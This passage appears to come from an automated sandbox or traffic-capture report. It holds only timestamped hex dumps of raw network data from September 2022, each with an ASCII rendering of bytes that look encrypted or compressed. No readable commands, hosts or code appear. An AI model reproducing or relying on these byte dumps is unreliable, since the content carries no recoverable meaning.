                                                          Data Ascii: ).8:vj;gAq%3'f`5&(j9'l530l'd;jGk*zvXuD_A)W7}{*&#[H+q?$.QFj,,#\Z1{k!pB&:H5sYXKD6!Olve/CM| #O
                                                          2022-09-11 08:16:25 UTC97INData Raw: 1f d0 65 67 24 b6 d8 22 8e 9b e3 c5 7a b3 a5 f8 61 cb 60 41 ef 16 a8 1c e2 1e d5 ef 28 23 02 22 48 da 6c e0 92 e0 a6 95 08 2a f0 16 e1 e3 21 1c 3e ac 5c 8e ea 35 19 63 6e 22 c7 6a 24 2d 67 2e ff 51 06 db 64 57 34 dc f3 b6 c5 eb 15 b3 60 af 52 25 74 90 e6 52 27 f5 cd 99 3e fc 3d 3f e7 28 c0 3e 35 30 38 a2 da e4 37 80 eb a6 15 b2 84 e2 e1 5f 64 05 47 a2 d0 ee 76 4f 9e 9c 80 ac 46 52 70 85 d8 08 e8 d7 48 7d 48 b2 98 0f 41 57 58 57 db 6a d1 2c 98 7a f8 2a 06 d3 bf 11 d9 7f 3a b2 0a 11 c8 86 af eb 6b d7 35 32 7d 29 86 c6 40 a1 a1 c6 e5 97 85 55 a5 0d e4 3b ca 96 46 18 04 1c 40 71 11 80 f2 be 28 a5 0c 07 e2 2a 27 0a af 89 eb d3 a6 10 0f a7 47 88 08 2d bd 9d 4d 34 f4 64 fe b4 5b ef 57 e1 72 48 f0 1f 81 d3 9d 91 a5 e1 73 c3 d6 34 02 08 bb e1 d7 f7 ce 7a fc 2e a7
                                                          Data Ascii: eg$"za`A(#"Hl*!>\5cn"j$-g.QdW4`R%tR'>=?(>5087_dGvOFRpH}HAWXWj,z*:k52})@U;F@q(*'G-M4d[WrHs4z.
                                                          2022-09-11 08:16:25 UTC101INData Raw: 73 12 1a f7 96 91 90 1d 14 97 ca 10 29 66 eb 22 cb cc 50 92 af 6f 95 6c 54 c8 13 34 58 20 48 c3 8c 65 15 d9 d3 a3 ef aa 22 1d f8 73 ac 67 ac 73 ad 72 bf b2 e1 4e 1c 88 0c c4 59 2c 6e 02 ba 44 ac c6 cd 91 eb 37 48 e2 c3 ec 0e 2c 9b 08 71 1f c9 63 bd af f4 24 6d d7 07 af 6c 39 bc c4 be 1b ff 66 6e 28 39 fa 34 09 fa 44 49 86 3b 92 1f 94 9f 63 09 3c 90 ff c2 57 9a 01 e9 e7 1a 5c ea ef f2 a3 b4 55 ad 0c 25 d1 0f e8 94 19 de 07 f3 39 bc 63 d3 d7 6d 9f b0 9e 32 a8 eb 3d 4e 89 f4 71 b1 61 65 b4 32 b7 44 9a f6 37 e1 9f 49 a7 f2 94 e2 b5 86 6a 9e c1 f3 6a 00 02 60 25 6a 2e 25 20 1a f7 0b a6 81 54 b2 58 99 47 81 42 49 57 9b 60 2e 55 19 34 fb 06 bb d6 7f 74 eb cd 04 e4 2d 53 da a1 91 d3 c0 80 e7 6a 30 36 99 49 e6 92 00 a4 ba a7 ef ca f2 6e 47 28 62 05 02 84 00 f1 b5
                                                          Data Ascii: s)f"PolT4X He"sgsrNY,nD7H,qc$ml9fn(94DI;c<W\U%9cm2=Nqae2D7Ijj`%j.% TXGBIW`.U4t-Sj06InG(b
                                                          2022-09-11 08:16:25 UTC105INData Raw: 7f 0e 65 ce 5c 36 83 6a db 37 41 e8 1e 68 a6 95 58 6a e8 db 4d 9e 33 a4 62 06 c0 e1 94 90 ef d3 1f ff b2 aa 68 f1 f2 20 ed 68 ef 85 a6 e7 4b 66 9d 98 a5 c8 c6 23 07 a4 c8 a3 03 0e d8 5a 28 6b 7e 3b 9d 71 4f 13 8a be a7 ad 63 66 68 d7 9b 6a fa 36 d3 18 21 97 d6 66 96 1a 90 14 47 22 87 ac 60 9d a7 61 ed 5c d5 5d ba b1 6d a9 ac a9 65 ac 63 08 44 77 b8 62 7c 71 ec 11 a0 e0 82 3d 48 41 d1 5f b9 ff ef 73 da 4b 17 1c 6b a6 32 24 7c 5d 80 99 e8 43 ea 60 cd c3 74 c2 dd 86 08 ec 7a b0 ed 20 a0 05 cd 95 4d b7 2d 6c e7 7e b7 6d 5f 80 7e a6 a5 00 4f e3 aa 6e 67 55 4d 8b d3 e8 25 ba 08 80 96 0f e2 7e 75 a1 ae eb ca a2 80 69 a7 00 da 6d 5f 38 ab dd e7 91 18 05 cf 68 fe fe 43 e0 bc bd cd 7f ff ab 23 d3 52 2a b3 cf 56 2a bb e5 99 87 e7 5e 3a 83 e7 56 3e 8e e6 fb 51 80 3e
                                                          Data Ascii: e\6j7AhXjM3bh hKf#Z(k~;qOcfhj6!fG"`a\]mecDwb|q=HA_sKk2$|]C`tz M-l~m_~OngUM%~uim_8hC#R*V*^:V>Q>
                                                          2022-09-11 08:16:25 UTC110INData Raw: c9 7d 94 ac e1 db d2 41 47 ea ac 8c 06 f0 2a 08 e2 dc 31 ac de 66 c3 b9 94 4d a1 e8 ba 59 49 63 a5 ec 2d f1 58 c2 30 a6 8c e3 f9 08 d0 5f 1d 11 36 d8 31 80 35 c1 6a a4 77 5b 4d 43 7f b8 94 52 60 2c 67 9e db 27 db 31 85 be 39 fb 26 c4 3e da 20 9c 1d eb fc 7d 26 b4 35 eb 65 53 2e 3c 02 eb 38 bf 20 31 25 93 6b a7 4d 57 66 b4 4c bd 31 a5 c8 4a 4b 4f b4 2d d0 e9 7c 14 fa d4 75 85 7a 4a db 73 dd 84 1d e1 45 45 f2 30 0a 35 9a 32 bf 0e 6f b6 d2 80 bb fa 4d 4c df 8c 20 f2 1c de be 32 b5 50 6e bc 73 1d b0 d2 5e 99 c4 31 f7 6d 3f 72 53 56 52 d9 19 d9 04 fb 0e c3 7f 52 df 60 e2 a7 00 df fa 91 82 46 b1 bf 23 7a e0 0c b2 37 55 bc b7 ef 63 b8 00 b2 4e 47 5f f6 64 04 6a 5d a4 3f d8 b5 58 65 ef 53 b2 2e 9a b7 eb c7 8b 58 95 a7 69 6c 39 5e 5e 41 b0 e8 ae 46 fa 7b 25 65 5b
                                                          Data Ascii: }AG*1fMYIc-X0_615jw[MCR`,g'19&> }&5eS.<8 1%kMWfL1JKO-|uzJsEE052oML 2Pns^1m?rSVRR`F#z7UcNG_dj]?XeS.Xil9^^AF{%e[
                                                          2022-09-11 08:16:25 UTC114INData Raw: fc 6f f0 0f c1 5e 9d e3 dc 90 d6 81 38 2d 6e 01 45 0a ce e8 2c 9a 77 2b 54 da e9 56 1f 28 8d e8 85 48 a4 6b f9 58 40 a7 8d 8d a2 50 12 eb 20 e4 68 70 70 a7 cd 6d 8c ab 5d 89 70 22 38 3f 2e 76 a6 fa a8 bd f7 8b 41 55 10 24 76 9b 46 18 d2 e5 5c 18 22 10 2c b3 db f9 e6 19 dc a2 22 69 c3 70 82 44 8e 77 d7 07 3e cb fe 16 a3 1f c3 0b ec 1f b5 43 93 29 34 cc d3 2b fb 34 9b dd 2a 47 55 f8 d5 0b ef 7e d5 25 15 41 18 33 cd 7d 9c a2 13 39 a1 05 8d 2d 44 b2 48 e3 bd 8f 3e 7b e8 1c 9c 73 7c bb bb 77 a9 79 b8 75 a8 37 d5 46 2c ef 92 08 fa 61 ef 74 d4 44 23 fc a5 ed 38 35 d4 49 8a 59 c9 4b da f6 18 5f 18 28 69 12 d5 e9 0c c9 68 70 f5 26 cf c9 7a 50 bb 32 a4 19 27 0a e0 f5 ee 01 eb 5f bc 4f 69 20 67 07 a0 17 ad 0d 4d c8 b4 bf b2 c6 2e 3d 00 1a 43 ae d6 0e b7 48 f5 de 4f
                                                          Data Ascii: o^8-nE,w+TV(HkX@P hppm]p"8?.vAU$vF\","ipDw>C)4+4*GU~%A3}9-DH>{s|wyu7F,atD#85IYK_(ihp&zP2'_Oi gM.=CHO
                                                          2022-09-11 08:16:25 UTC118INData Raw: fe c7 22 c0 48 4e 26 61 e1 a9 e1 e7 2a f8 0c 9c b0 71 d3 1a 61 a8 d3 42 c6 d5 a4 1b ae 1c 3b 03 6b dc d3 59 20 45 8a e5 44 2b 8a a4 ea e4 a9 e4 2b c7 47 6a 28 e5 e6 aa 68 a4 2b 27 ab e5 7c f7 6e 9c 55 a3 5a 93 6e 8e 47 a3 74 ad 7a a3 7d b4 6e ab 62 a3 6f 98 92 44 38 61 f5 4f ac e3 21 96 96 20 25 ef ea e9 a5 81 8a 3c f2 84 b4 b9 09 d6 6d 11 eb 5a 55 31 78 a3 e1 4e 4b 6e b6 91 8a cd 92 b6 59 d3 1d 5d c5 85 21 1e 5c 77 1a f2 1b b3 3b a3 b7 7f 03 81 35 41 d9 82 3c 12 a8 2e c2 e3 85 29 4d c2 65 ec 2f 6a a7 81 05 3c fc 64 af 81 61 c8 58 d2 2d 8d ca 80 d2 f4 56 3b 99 ba 1c 40 e7 7d ec e6 2e ff fd 68 01 cc a1 34 c6 1e ce 6e 17 4a 31 b7 c2 bf 5d 10 d5 f8 45 8b 1d b9 a1 1e 41 95 1f b1 68 62 f4 fc 2d ff 6b ca 49 77 f1 a1 f4 ec b1 0f 95 d6 49 b0 3a bc e4 70 1f 88 66
                                                          Data Ascii: "HN&a*qaB;kY ED++Gj(h+'|nUZnGtz}nboD8aO! %<mZU1xNKnY]!\w;5A<.)Me/j<daX-V;@}.h4nJ1]EAhb-kIwI:pf
                                                          2022-09-11 08:16:25 UTC122INData Raw: a7 e9 e5 f2 68 e9 a6 d3 db f5 b8 e9 9b 57 a5 94 d9 34 72 d6 13 97 f5 44 d0 3f 8b 31 18 aa 84 c1 15 bc 67 2e 6e a5 cd cb ad f5 0f da f7 3a f0 d5 5a 7a a2 6a 2a 60 2a 44 40 a9 af a2 67 3d 18 90 b1 67 8e 8b e9 4d ff 8b 35 2d 77 f5 28 f9 9c 47 26 ab 6c e3 e6 a2 ad ab 8f 80 65 41 4e 52 4d ba a6 28 6e 13 5a 22 11 10 61 2f bf 91 44 22 e7 e7 7b 3e 29 e1 55 15 6b 2f 98 97 16 06 bf 09 50 ed 32 fb 38 bc ee 2d a5 3e 42 8f 74 7c 52 dc e0 be 5e ca e7 12 d6 d5 90 92 de 67 ac e1 97 1f 06 0a 9c 87 7e e1 8f b6 d7 e9 30 6b 52 88 26 c9 9b 27 26 a3 33 94 d0 b0 1f 0e b9 02 c6 ac 6e 81 42 f6 20 79 9b 4b af 6c b4 76 a7 6f be 9d 5a f1 69 2f a5 b1 63 c1 b6 37 1b 7a 7c 66 8b 20 56 0b d6 76 6b b5 e8 ea 6d e9 9e 7b 06 e7 ad 65 26 63 a7 3a 7a cb 0c 79 f3 a3 9e 5b 53 bf 96 f8 e0 62 77
                                                          Data Ascii: hW4rD?1g.n:Zzj*`*D@g=gM5-w(G&leANRM(nZ"a/D"{>)Uk/P28->Bt|R^g~0kR&'&3nB yKlvoZi/c7z|f Vvkm{e&c:zy[Sbw
                                                          2022-09-11 08:16:25 UTC126INData Raw: 48 0e 33 26 9f 00 fd b6 eb 7b b6 a6 83 2f 0a 5b 8d dc 0a c3 4a 73 7b 2f 0a cf e1 6b 2d de 9a 68 2c 82 4c c5 26 6a 88 c7 0b 2f c0 c1 2e 2d a5 e2 0d c7 e2 1e 8e 46 d6 16 6f 3c c6 f8 b9 60 0a d0 7e 75 9e f3 7a 96 6b 38 36 70 7b 9d 41 6d 2a 6b d3 d0 a5 1f db a9 65 6b 03 4c 1e 21 db e3 72 a0 33 e1 e7 fd fb f2 9f 44 ea ca 80 23 69 cb 81 5e 64 f1 33 1b 3c f1 5a 04 bb b5 ea b7 6a 27 e2 1a 3f c7 f2 5f 0a 0b a6 c7 0f cc ee 6b dc 54 e1 68 2e 00 cf c7 18 56 89 4d 93 92 2e c0 0d c6 02 d4 84 97 ec 87 7f dc fd 76 6d a6 44 dc b3 65 1e 23 d8 8e 90 45 70 4e 05 08 40 4d 04 e9 cb 82 8f 52 59 c1 0a e9 34 37 ea f1 1c ce a3 27 34 c9 1a e7 0c 81 6a e7 04 db 28 b7 2a d1 7c 87 2a d9 64 24 b1 80 1a df 5d 97 25 88 08 da 42 b9 43 c5 17 87 55 c5 17 bf 6d c5 17 ca 17 a8 08 da 62 b0 08
                                                          Data Ascii: H3&{/[Js{/k-h,L&j/.-Fo<`~uzk86p{Am*kekL!r3D#i^d3<Zj'?_kTh.VM.vmDe#EpN@MRY47'4j(*|*d$]%BCUmb
                                                          2022-09-11 08:16:25 UTC129INData Raw: 36 a4 e9 f9 cd 83 e5 47 8e 6c a4 29 c8 6b f9 d7 5c 2c 14 10 5f 8a 47 b8 12 03 92 5f 71 bf 7e df 84 36 18 ce 43 2b 07 a9 c4 ca 47 c3 fb 11 05 66 67 87 8a aa c9 25 0a e7 d8 25 ea a0 9d 91 dd 8f 4c c7 4c 25 54 1f 5c e4 d2 ae 18 9c d9 1f ac 7e cc 72 cb c0 07 03 c4 a0 67 7a d0 07 a4 89 1a 9c 0e 2d 15 1b de e8 2d e9 ce a5 9e 3b fe 88 0c ca 4e 88 ae a8 67 8d 4b 64 20 10 4e 06 c8 f1 dc 96 c7 25 a1 5c 3a 91 f0 2f 42 cb a1 5c 5c 69 40 df fc 24 23 43 44 3a 3d ca 28 e3 ee 4c 47 60 bf 85 b8 89 91 2b c0 f3 2b 6c 2f e5 e9 a0 e2 ad 25 2e 36 3d e5 2b 65 ff 23 d9 81 80 89 af 23 ab 4e 81 56 3c 81 0b 46 96 1c 0a 16 3d 63 48 0e 33 d3 cd 30 2f f3 eb 7b b6 a6 83 2f 0a 5b f6 c7 0e 87 28 31 7b 2f 0a cf e1 6b 2d 2e a5 fe 75 82 4c c5 26 6a 88 c7 0b 2f a6 e3 60 27 a5 e2 0d c7 e2 1e
                                                          Data Ascii: 6Gl)k\,_G_q~6C+Gfg%%LL%T\~rgz--;NgKd N%\:/B\\i@$#CD:=(LG`++l/%.6=+e##NV<F=cH30/{/[(1{/k-.uL&j/`'
                                                          2022-09-11 08:16:25 UTC130INData Raw: 6b 2f a2 9c e0 5e 00 88 8d d4 79 e9 b3 eb da 3a b3 98 99 02 af 82 47 6a cd 00 f4 09 90 2d 62 de 91 69 d6 38 53 9a 07 11 08 48 df e3 75 6a 67 fd 4d 83 96 af d1 c3 8e 63 2d 21 90 12 27 5e 54 ea 0c 90 3d 27 e6 ea 80 41 ab 7d e1 c3 4d 23 0a 91 6b f2 a6 34 a5 61 f9 54 57 73 22 7e df 84 b1 bb e6 fb 36 00 c9 86 8a 5f 66 31 46 31 c2 cf 87 57 a5 55 1b 66 9d 4a 34 23 2a 58 8e 3c 0b 18 a4 c8 7d 09 91 da 60 0d f7 0c 99 ae 4a 28 00 8d a5 2b 36 fb cd 05 4a 09 bc f9 27 59 d3 be 3c 11 07 39 64 a9 af f1 34 eb 45 98 36 82 4a 93 4d 1b a3 09 cf 11 b3 fc 36 d5 5a 28 10 9f e6 fb 36 00 65 c4 49 d3 69 f6 82 da 32 05 53 f1 be a0 36 28 6c e3 e6 fb 36 00 ca 85 05 37 27 fe a8 01 c7 84 33 87 2f a4 a4 de c1 05 07 a1 40 ff d5 b5 3a 2b 36 fb c7 60 c5 8a 95 4d ba 5c d5 c0 bd 1e 38 e0 c2
                                                          Data Ascii: k/^y:Gj-bi8SHujgMc-!'^T='A}M#k4aTWs"~6_f1F1WUfJ4#*X<}`J(+6J'Y<9d4E6JM6Z(6eIi2S6(l67'3/@:+6`M\8
                                                          2022-09-11 08:16:25 UTC133INData Raw: 5c 90 f9 13 8c 3c da df ff 8f dd fe 5c 0c 5a ac e6 a6 63 8c 16 6f f1 00 8c 70 96 5a a3 1f 5d 9b 0e 96 2e 7d 4f f9 37 65 1f dd a3 64 cb 37 5f db d8 01 d1 41 5a db d8 62 f2 30 1f 2d d7 01 4e e3 dc 95 1f dc c7 0a 86 46 cd 37 d9 d3 d9 be fe d2 10 aa e4 28 64 eb cb 84 d2 1a a9 06 91 27 bf 09 fa a1 23 1e 18 da 1f 15 60 d2 d6 f2 19 a1 4d f0 17 92 24 dc e4 76 ac 5a c0 0f 82 50 60 fd bc 2d d4 3f 85 04 be 3f c2 75 2c 0c a4 81 f0 3f ef af f9 c4 c8 98 41 83 4a 17 18 5a a0 6a ba 82 44 40 65 69 94 67 9f 1a 0c 65 09 99 67 cb a3 7b 55 d1 16 5b 86 42 fc 5c 86 4c 7f ac 2a ba 9c 9e 12 41 bc 30 ab ee 23 f6 0c 37 fa 93 ea e9 1c da c1 0a a7 e0 20 a1 62 eb cd 82 d2 5b c7 ce 2a 26 65 e4 40 b8 5f b3 b0 d2 e0 99 f4 d2 24 c1 45 08 f7 89 54 ea 72 31 f2 c1 57 da 1b 97 59 08 da 7b 2b
                                                          Data Ascii: \<\ZcopZ].}O7ed7_AZb0-NF7(d'#`M$vZP`-??u,?AJZjD@eigeg{U[B\L*A0#7 b[*&e@_$ETr1WY{+
                                                          2022-09-11 08:16:25 UTC136INData Raw: 9d f7 c5 a5 87 e9 e3 64 85 22 54 6b 09 95 d2 ff b8 e0 0e 5e 97 a3 f6 2b a6 e1 e4 29 ee e9 cf bb d3 f5 77 d9 6a 37 09 af 61 cb cb 57 52 a1 e4 a8 e5 76 12 2a fb c2 5d 6c b6 d2 24 a4 1e 3e 1d 26 21 12 06 6b 94 99 8c c5 68 bc 0e 15 2c 17 22 c1 a3 6d 1f 99 4d 9b 58 6a db 2d 6f e2 e3 de eb 61 7c a6 43 34 5a 57 f8 68 a5 1e d0 60 5e 97 60 5e b3 a7 29 c0 75 ce da 50 54 69 3a 3c ef 19 66 c6 79 61 d4 79 41 91 14 d3 0b 5a c7 9d 8f 36 f7 b9 50 46 fc 6a 5a c3 73 65 2c b4 07 d1 b9 2f 75 e7 bd 7e 0d 8b e6 74 07 9c 24 f0 f2 27 24 e8 2e ec b5 46 9e fb 43 0e 5f 35 d0 0d c7 ad 45 d5 fa 4a 61 73 a7 c8 38 ac a3 28 6e 23 04 0a 58 f2 4a 70 34 0e 90 9b 3e 46 d4 35 2f d9 2e 56 12 9c 51 8d f1 db 26 d0 9e 1f c1 91 45 12 52 ec 7d 31 26 59 55 69 d4 9e e2 a8 06 0c 28 a4 f2 8a 54 64 ba
                                                          Data Ascii: d"Tk^+)wj7aWRv*]l$>&!kh,"mMXj-oa|C4ZWh`^`^)uPTi:<fyayAZ6PFjZse,/u~t$'$.FC_5EJas8(n#XJp4>F5/.VQ&ER}1&YUi(Td
                                                          2022-09-11 08:16:25 UTC139INData Raw: 5a 6c 93 39 c4 b3 6c 90 81 6a 0e d4 4b 30 0d cf f6 f0 a8 ff a7 3c 35 46 65 30 d2 39 19 a0 c5 7f 42 56 bb 4a 16 35 3a 29 70 41 1d ac af 62 64 08 36 1c e4 7f 34 20 6e 95 0e cc 58 a4 6e 17 c9 70 44 88 19 c4 f3 2b b2 41 5a ec 93 13 fa d2 61 2b 68 89 6d a1 d0 1e e4 97 6d c7 47 a2 5d 3c aa 6b b6 94 6d c3 9b ca 94 af d8 ce a9 48 af 41 84 ca 8a 6f ac e9 4e 7a 1f 44 c9 6a 58 a0 fe f6 c6 72 9c ed f3 0a 4e 65 40 6b 16 c2 36 d1 94 6a 57 9c c8 a2 8d e4 b3 12 e7 53 f6 2a 4f a7 11 d9 81 35 3d 41 4f a0 1e 19 a7 ef e2 a5 3d 8f 17 69 8c 8d 08 ca b7 74 e1 20 26 ce c3 2b c7 4e 01 91 54 cc a8 74 48 db 6f b7 f0 78 a7 f9 75 49 51 4f 52 2f 66 e9 e6 e8 6c 5b 4a fc d2 18 c3 a6 59 eb 02 76 eb 13 b0 aa 8b 4e b4 89 5c c6 cf fd 2a 5c db c6 c6 a3 e4 ea e4 06 3d 01 0a 92 c6 4c cc 7d 67
                                                          Data Ascii: Zl9ljK0<5Fe09BVJ5:)pAbd64 nXnpD+AZa+hmmG]<kmHAoNzDjXrNe@k6jWS*O5=AO=it &+NTtHoxuIQOR/fl[JYvN\*\=L}g
                                                          2022-09-11 08:16:25 UTC143INData Raw: e2 28 a5 7f a4 78 a3 4d 29 c2 a6 4a ec 0c aa 63 f7 b4 a0 ef a2 6d a8 ea 1e 5c 66 6f 93 4a 1f f0 3e 40 6e e6 60 20 a8 64 cf e0 b2 6a b3 64 02 16 92 66 90 0d f3 6e 72 b6 ae 33 fa 6e 19 51 2e 8b 5b db eb 43 6b d4 55 28 cf 00 4f dc e0 77 b5 bf 25 eb 63 e8 3d 89 98 a1 f5 eb 26 59 cf eb 65 62 e8 f8 f3 a5 e8 2c e1 29 4f 65 c8 1e 84 76 50 b6 19 ff 67 92 9f aa b6 bb 53 78 41 aa 9c 04 32 aa f7 fa 67 30 3d aa cc c1 67 ef 21 a9 67 a8 25 a9 c8 c6 6a aa e6 66 f4 6f 19 6b 0e 2a a7 ee 23 aa 13 3f 0d bc d6 c3 f9 b1 d3 3b 01 12 5e 14 de ec 24 91 78 30 c2 99 31 fc b0 85 48 52 60 7c b1 23 06 65 ff d5 58 6a 6b 99 ec 31 fc 39 77 8b ec cd a2 fb 43 17 22 aa fa ba 8f ed 08 eb e3 e6 6b d7 5f e3 6b df dc a4 fe ff 6b 0e 46 93 be c3 6b fb 73 7c 59 4f 68 5c d3 a5 9f 2d 3d 08 f9 d4 4f
                                                          Data Ascii: (xM)Jcm\foJ>@n` djdfnr3nQ.[CkU(Ow%c=&Yeb,)OevPgSxA2g0=g!g%jfok*#?;^$x01HR`|#eXjk19wC"k_kkFks|YOh\-=O
                                                          2022-09-11 08:16:25 UTC144INData Raw: da 9e 53 1e f5 b3 2d f7 c2 e3 e6 db 63 58 28 a2 06 de a0 2d e4 d1 32 2e 7c f2 fa c6 79 3d 5d b2 a9 c7 e6 a9 25 38 76 6a 4c 18 bd 16 a7 9a 2c b2 c2 b3 66 a2 1a 7e e7 5b 95 99 52 a2 52 51 a4 43 ec 0a 2e 23 6e a0 69 e1 85 c9 02 cb c7 00 d9 07 c9 14 a1 16 db d5 26 4a b8 e1 c4 ed 9b b4 22 62 99 59 e5 5e d5 e7 69 cb 85 3c 49 52 8d 5e 4f 6a bf 73 ba 04 65 65 79 17 88 7a 9b d3 19 d4 f8 c3 e1 da 03 6f b2 de e7 16 22 d3 18 d5 92 ec 14 71 9b 4a 79 27 09 a7 74 3e 48 e0 4c 82 25 ec ae a5 73 c6 0c 72 65 b7 59 0b 53 eb de 26 78 80 92 b5 49 1b 7b cb 9b b4 3b 8b 4d ee d4 9c 22 60 1f 1d a2 b9 e9 d6 ab 25 00 6b 66 bc 8d 64 9a 7f be f9 00 9d 00 2c 0d ac 02 09 79 3f 43 e8 48 f2 35 28 64 20 e7 eb 63 cf 8f 23 a5 b4 06 15 78 73 12 16 35 e1 b8 fe d1 8a 33 97 c0 b2 b1 2a 17 d8 15
                                                          Data Ascii: S-cX(-2.|y=]%8vjL,f~[RRQC.#ni&J"bY^i<IR^Ojseeyzo"qJy't>HL%sreYS&xI{;M"`%kfd,y?CH5(d c#xs53*
                                                          2022-09-11 08:16:25 UTC148INData Raw: 73 79 34 d9 4f 82 62 15 b3 13 42 62 8e 83 e7 7e b6 1c 5d 24 5c 03 6a fb 21 57 21 13 e3 e8 aa e1 1e 57 a1 6c a7 e9 dd 9a a1 e0 20 6c a3 25 6d 34 73 e1 a5 ec a7 6a a7 59 5d 1d 19 a0 f7 70 1c 62 6b 1e a8 53 8a fa be 2f 0c 7b 40 e7 29 6d a2 e6 6c 2d 2b 1d 54 17 36 05 ae cb 01 26 1a 55 80 8d a9 6e 0d 40 2b f1 b1 e7 2b 73 34 e6 22 dc 93 e7 2b 67 40 b1 a4 99 37 a5 3d e3 2a 63 29 67 2d 7e 36 65 23 fb b9 a9 f0 ba 73 79 b8 fd 2e 35 7f 19 25 16 c1 37 5d 23 f6 a3 34 27 52 49 41 9d 22 63 ad c1 98 8f 10 3b 8c 9a 19 f7 cf fa fb a5 df 51 14 6a c2 f5 9a 43 3d 63 ac 54 b4 73 15 4c 03 ad 61 69 93 de 81 50 39 56 5a d4 19 c9 05 a1 69 b3 2d 60 7a 70 fe 2b ce 81 04 3a 62 af 5d ac 1e dc a0 06 3a 96 ae 99 16 6c 7a 79 2c 50 16 21 47 cc 68 a4 f3 bb 2e f0 37 ba 35 2e d8 94 a3 65 69
                                                          Data Ascii: sy4ObBb~]$\j!W!Wl l%m4sjY]pbkS/{@)ml-+T6&Un@++s4"+g@7=*c)g-~6e#sy.5%7]#4'RIA"c;QjC=cTsLaiP9VZi-`zp+:b]:lzy,P!Gh.75.ei
                                                          2022-09-11 08:16:25 UTC150INData Raw: 85 22 6c c7 1d 3d 55 ec 51 31 27 e5 35 69 23 22 98 1b cc 36 ae 97 87 0f 84 15 49 60 56 02 17 21 eb 93 ca bb e2 44 89 11 32 7a 4e 6d a2 5d 2d c6 66 9b 60 94 6e 92 3f ca 14 fe c8 01 af f2 0c b1 62 6f 24 ef 04 5e 30 dd a9 a6 57 11 5e 64 b4 f2 84 7d 13 3f ea 86 ef d2 94 a6 94 95 62 8c 77 eb cf 40 63 bd 77 2b 26 6c 2a b3 8c b3 1e 35 6a 1b 66 a0 62 2b 32 4b 02 61 28 8e a5 42 fa 05 77 2f 92 fd b7 b6 0d cc 1e 99 24 1f fa 5b 3c c7 b5 7b b5 16 cd cf c8 09 c4 0d e7 ec 64 08 65 81 be 69 c4 b1 ae 6e 64 ef 7c c4 d6 5d 62 77 6c c1 2a e8 c0 23 73 d5 15 e6 99 4d 44 bf 74 99 d2 26 1e 18 77 c9 d4 ba 6f 71 59 56 35 c4 99 49 40 6c 74 ba 2c 23 4e 87 5a a3 3f ff 40 69 4a bf 64 bb 67 b8 db 3a 2e e2 04 76 0c 32 cf c0 7b d6 58 b4 88 44 62 05 ed 13 d5 89 ec f4 8a 57 8d 6f 34 3b 05
                                                          Data Ascii: "l=UQ1'5i#"6I`V!D2zNm]-f`n?bo$^0W^d}?bw@cw+&l*5jfb+2Ka(Bw/$[<{deind|]bwl*#sMDt&woqYV5I@lt,#NZ?@iJdg:.v2{XDbWo4;
                                                          2022-09-11 08:16:25 UTC154INData Raw: 0f 4a b3 2d ee 86 41 ac e7 7a 38 c3 35 ac 1c 96 10 38 71 eb ec ce e2 1c 71 34 e9 90 1d dd 01 ce 03 de bb 97 72 65 5d 53 a8 05 cb ad f1 37 c8 04 e8 e4 aa a5 f1 83 d7 60 ec ce 4a af 6a a7 e3 2e 2b ee 3c 3a 24 5a 18 aa 65 10 cb 32 13 6e 2c c4 1a c1 e9 5c 16 91 2d dd e6 e4 bc b7 6c c3 0e 2b ef ae e6 75 f7 e7 5d e9 a6 92 01 fb 5c cd 02 fb 3c a8 83 4b e9 de f4 b7 07 3d 13 34 03 d3 0a 30 13 32 71 dc e6 24 90 28 6b d9 e3 de e8 ab 1e a2 ec de c8 8a 7b 4a 92 96 22 44 38 9d 29 65 68 c5 0d a3 6e c0 62 a1 58 c2 87 05 36 07 61 de e4 d2 58 ee 65 ed 56 bb 63 b7 6a f0 39 8b 43 a5 61 24 b7 f5 bc 15 35 9c fa 31 6e e2 2b a6 79 b1 61 a6 63 a5 60 fd 3b 18 5e d3 c3 7a e1 56 10 6a 24 a0 d2 18 e1 34 83 29 68 da 62 f7 b3 68 24 af 81 40 37 7d 2f 81 e8 cc 6b a7 6a 23 2e 13 1a 65 ea
                                                          Data Ascii: J-Az858qq4re]S7`Jj.+<:$Ze2n,\-l+u]\<K=402q$(k{J"D8)ehnbX6aXeVcj9Ca$51n+yac`;^zVj$4)hbh$@7}/kj#.e
                                                          2022-09-11 08:16:25 UTC155INData Raw: 54 35 19 13 0c 6a a7 fc 8c 96 ef c3 7d 99 6a ab ae e6 a4 62 6e 21 2c 6c 2a a7 7e 63 93 cb 2f 76 aa 52 07 1f c2 70 25 77 ae 16 47 ef dd e0 fa 45 66 29 03 4a a7 2b c9 c9 af 4c 05 62 8d 58 3b 62 a2 0a 44 39 d7 58 b3 e1 08 5b f4 07 db 6b 7a 6a 8e 97 7e e8 4d d6 13 a3 ca 2f 5b 77 5e f8 4c fa d2 10 2c 55 8c 33 df a2 2f 2a a6 a3 32 f3 f9 c4 d6 ae 22 40 cc e5 a9 6e 2b 5c 5f dc f8 c5 22 9c 29 3b b5 a2 22 39 69 c5 b8 ba af fb 74 df 9e 67 fd 65 72 2f d4 e5 da e6 20 c5 56 1f 86 6f d3 53 62 ee ac e0 a7 03 06 ee 6a 44 45 a6 2b 57 92 a2 e6 6b bf 06 de ec 6e 36 dd 37 c1 be ea ae fb 14 da 04 59 fc 14 44 86 81 55 6b 19 10 dc 24 ac ec ea 5b 5c 85 8f cf cf d2 7b fe 07 bc 2f 26 f4 8a b3 31 94 50 1a 6f 66 be b3 1f d4 d4 1f 68 a5 4a 87 a9 ef 60 26 aa 66 ba 9e 83 85 ea 55 b8 ec
                                                          Data Ascii: T5j}jbn!,l*~c/vRp%wGEf)J+LbX;bD9X[kzj~M/[w^L,U3/*2"@n+\_");"9itger/ VoSbjDE+Wkn67YDUk$[\{/&1PofhJ`&fU
